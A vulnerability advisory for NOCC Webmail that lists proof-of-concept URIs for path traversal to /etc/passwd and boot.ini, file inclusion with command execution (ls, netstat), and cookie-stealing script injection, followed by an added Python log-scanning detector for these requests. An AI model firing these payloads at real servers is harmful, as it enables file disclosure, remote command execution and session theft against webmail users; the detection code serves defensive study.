NOCC Webmail Multiple Input Validation Vulnerabilities
These issues can be exploited using a web client.

The following proof of concept URIs are available:

http://www.example.com/[path]/index.php?lang=../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/index.php?theme=../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/index.php?theme=../../../../../../../../../boot.ini%00
http://www.example.com/[path]/index.php?cmd=ls%20-la&lang=..%2ftmp%2fphpA91.tmp1140601928.att%00
http://www.example.com/[path]/index.php?cmd=netstat%20-ano&lang=..%2fprofiles%2frgod@somehost.com.pref%00
http://www.example.com/[path]/html/error.php?html_error_occurred=<script>alert(document.cookie)</script>
http://www.example.com/[path]/html/filter_prefs.php?html_filter_select=<script>alert(document.cookie)</script>
http://www.example.com/[path]/html/no_mail.php?html_no_mail=<script>alert(document.cookie)</script>
http://www.example.com/[path]/html/html_bottom_table.php?page_line=<script>alert(document.cookie)</script>
http://www.example.com/[path]/html/html_bottom_table.php?prev=<script>alert(document.cookie)</script>
http://www.example.com/[path]/html/html_bottom_table.php?next=<script>alert(document.cookie)</script>

The following proof of concept exploit is available:
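
Added detection example (not part of the original advisory and not the exploit it refers to): the request patterns in the URIs listed above can be matched in web server access logs. The function name, the `/webmail` path and the log lines are constructed for illustration; the parameter names are the ones listed above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters named in the advisory, grouped by the issue they are tied to.
INCLUDE_PARAMS = {"lang", "theme"}
XSS_PARAMS = {"html_error_occurred", "html_filter_select", "html_no_mail",
              "page_line", "prev", "next"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r"[<>\"']")

def classify_request(log_line):
    """Return a sorted list of findings for one access-log line (hypothetical helper)."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    findings = set()
    query = urlsplit(m.group(1)).query
    # parse_qsl percent-decodes values, so %2f and %00 are seen as "/" and NUL.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in INCLUDE_PARAMS:
            if "\x00" in value:
                findings.add(f"{name}: null byte")
            if ".." in value or "/" in value or "\\" in value:
                findings.add(f"{name}: path traversal")
        elif name in XSS_PARAMS and MARKUP_RE.search(value):
            findings.add(f"{name}: markup in parameter")
    return sorted(findings)

# Constructed sample log lines (combined log format), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /webmail/index.php'
    '?lang=..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /webmail/html/error.php'
    '?html_error_occurred=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 310',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /webmail/index.php'
    '?lang=en&theme=default HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify_request(line) or "clean")
```

Values are decoded once, so a doubly encoded value (for example `%252f`) is not flagged by this check.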